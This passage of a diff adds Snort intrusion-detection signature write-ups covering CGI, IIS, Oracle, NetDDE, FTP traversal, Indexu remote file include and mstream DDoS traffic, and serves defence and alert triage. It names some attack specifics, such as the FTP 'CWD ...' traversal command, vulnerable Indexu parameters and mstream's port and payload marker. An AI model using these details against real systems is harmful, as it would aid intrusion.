+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1276.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1276
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap
+GETPORT request to discover the port where the Remote Procedure Call
+(RPC) ypserv is listening.
+
+
+--
+Impact:
+Information disclosure. This request is used to discover which port
+ypserv is using. Attackers can also learn what versions of the ypserv
+protocol are accepted by ypserv. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can
+be queried to determine the port where RPC services such as ypserv run.
+The ypserv RPC service looks up information in the local Network
+Information Service (NIS) maps. The ypserv program provides the server
+function for Yellow Pages (YP) by providing clients information from NIS
+maps. Multiple vulnerabilities are associated with the ypserv RPC program.
+
+--
+Affected Systems:
+	All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where ypserv
+runs. This may be a precursor to accessing ypserv.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a legitimate remote user is allowed to access ypserv, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for ypserv, not
+probes of the ypserv service itself. Because RPC services often listen
+on fairly arbitrary ports, it may not be possible to detect misuses of
+the ypserv service itself. An attacker may attempt to go directly to the
+ypserv port without querying the portmapper service, which would not
+trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2572.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2572
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential 
+weakness on a host running a web application on Microsoft Internet 
+Information Server (IIS).
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential 
+weaknesses in a host running a web application on Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation
+on the host, this may be the prelude to an attack against that host 
+using that information.
+
+The attacker may also be trying to gain administrator access to the 
+host, garner information on users of the system or retrieve sensitive 
+customer information.
+
+Some applications may store sensitive information such as database 
+connections, user information, passwords and customer information in 
+files accessible via a web interface. Care should be taken to ensure 
+these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been 
+taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1779.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1779
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a directory traversal vulnerability associated with the Shambala FTP server. 
+
+--
+Impact:
+Information disclosure.  A successful attack may permit the navigation of directories and the viewing of files. 
+
+--
+Detailed Information:
+The Shambala FTP server may be susceptible an a directory traversal attack that permits the navigation and viewing of files in directories other than the intended FTP server's root directory. This exploit is conducted by executing the FTP command "CWD ..." or "cd ...".  This may possibly permit the identification and the viewing of files containing sensitive information.
+
+--
+Affected Systems:
+Shambala 4.5 FTP server running on Windows 95, 98, NT, and Windows 2000.
+
+--
+Attack Scenarios:
+An attacker may attempt to exploit this vulnerability to identify and view files on the vulnerable FTP server. 
+
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version or restrict anonymous FTP user access by assigning appropriate file permissions.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Miscellaneous:
+http://www.securiteam.com/windowsntfocus/5SP011P4KC.html
+
+--
--- /dev/null
+++ b/doc/signatures/3447.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3447
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1471.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1471
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/122-24.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-24
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a udp
+filtered distributed portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/2618.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2618
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "alter_mview_propagation" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck632.html
+
+--
--- /dev/null
+++ b/doc/signatures/3192.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+3192
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a host via a
+vulnerability in Windows Media Player.
+
+--
+Impact:
+Serious. Code execution leading to unauthorized administrative access
+to the target host.
+
+--
+Detailed Information:
+A directory traversal vulnerability in Windows Media Player can be
+exploited via a malicious skin file downloaded from a remote machine.
+This may allow an attacker to execute code of their choosing on an
+affected host and gain administrative access to that host.
+
+--
+Affected Systems:
+	Microsoft Windows Media Player 7.1
+	Windows Media Player for Windows XP
+
+--
+Attack Scenarios:
+An attacker can create a malformed skin file and make it available for
+automatic download and installation by a user.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2938.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2938
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/2432.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2432
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISC INN Usenet/NNTP server.
+
+--
+Impact:
+Denial of Service. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A vulnerability exists in the network news transport protocol server
+from ISC. It may be possible for a remote attacker to exploit a buffer
+overflow condition in the software to execute code of the attackers
+choosing with the privileges of the user running the daemon.
+
+--
+Affected Systems:
+	ISC INN 2.4 .0
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur. Once successful the attacker may
+attempt to escalate privileges by using further local exploits.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1553.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1553
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/867.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+867
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2131.txt
@@ -0,0 +1,72 @@
+Rule:
+--
+Sid: 2131
+
+--
+Summary:
+This event is generated when an attempt is made to access 
+/iisprotect/admin on a host running Microsoft Internet Information 
+Server (IIS).
+
+--
+Impact:
+An attacker may be able to perform administrative tasks on the server 
+without authorization and may be able to manipulate the database that 
+IISProtect by injecting and executing SQL statements.
+
+--
+Detailed Information:
+IISProtect is a third-party application that provides password 
+authentication to directories on IIS using a Web-based interface. An 
+attacker can bypass authentication by requesting a specific file with an
+encoded URI, and can then proceed to use SQL injection techniques to 
+execute arbitrary code with administrative privileges.
+
+--
+Affected Systems:
+Any host using any version of IISProtect below v2.2.0.9 with IIS.
+
+--
+Attack Scenarios:
+An attacker can use SQL injection to execute arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a legitimate remote user accesses the IISProtect administration site,
+this rule may generate an event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Check the host for signs of compromise.
+
+Disallow access to the IISProtect administration site from sources 
+external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7661
+http://www.securityfocus.com/bid/7675
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11661
+
+--
--- /dev/null
+++ b/doc/signatures/1176.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+1176
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running on a web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Attrition:
+http://www.attrition.org/security/advisory/misc/ecom-990420
+
+--
--- /dev/null
+++ b/doc/signatures/1721.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1721
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2941.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2941
+
+--
+Summary:
+This event is generated when an attempt is made to bind to the Windows
+registry service via SMB. 
+
+--
+Impact:
+Serious. Remote administration of the Windows reqistry may be possible.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to bind to the Windows
+registry service via SMB across the network.
+
+It may be possible for an attacker to manipulate the Windows registry
+from a remote location. This could give the attacker administrative
+privileges on the target host as well as the opportunity to execute code
+of their choosing.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If the Windows registry is accessible via SMB the attacker can
+manipulate the operating system registry settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000616.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000616
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_search.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "link_search.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/834.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+834
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/247.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+247
+
+--
+Summary:
+This event is generated when an mstream DDoS client communicates with a handler.
+
+--
+Impact:
+Severe.  If the listed source IP is in your network, it may be an mstream client.  If the listed destination IP is in your network, it may be an mstream handler.
+
+--
+Detailed Information:
+The mstream DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. At the highest level, clients communicate with handlers to inform them to launch attacks.  A client may communicate with a handler using a TCP packet to destination port 12754 with a string of ">" in the payload.
+
+--
+Affected Systems:
+Any mstream compromised host.
+
+--
+Attack Scenarios:
+After a host becomes an mstream client, it will attempt to communicate with handlers. 
+
+--
+Ease of Attack:
+Simple. mstream code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+There are other known client-to-handler ports in addition to 12754.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+--
--- /dev/null
+++ b/doc/signatures/1860.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1860
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000592.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000592
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "editor_validate.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
